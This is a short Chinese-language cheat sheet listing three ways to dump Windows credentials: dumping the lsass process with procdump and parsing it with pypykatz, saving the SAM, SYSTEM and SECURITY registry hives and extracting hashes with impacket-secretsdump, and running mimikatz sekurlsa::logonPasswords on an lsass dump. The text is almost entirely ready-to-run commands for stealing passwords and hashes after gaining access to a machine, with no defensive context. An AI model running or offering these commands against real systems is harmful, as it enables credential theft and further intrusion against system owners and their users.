1.pypykatz读取
项目地址:
https://github.com/skelsec/pypykatz
安装
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
python3 setup.py install
执行:
上传procdump.exe,导出lsass.dmp文件
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
导出lsass.dmp至本地,执行pypykatz
pypykatz lsa minidump lsass.dmp
2.secretsdump读取
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
kali中执行:
impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL
3.mimikaz读取
上传procdump.exe
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
下载lsass.dmp(选择相同操作系统)
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >pass.txt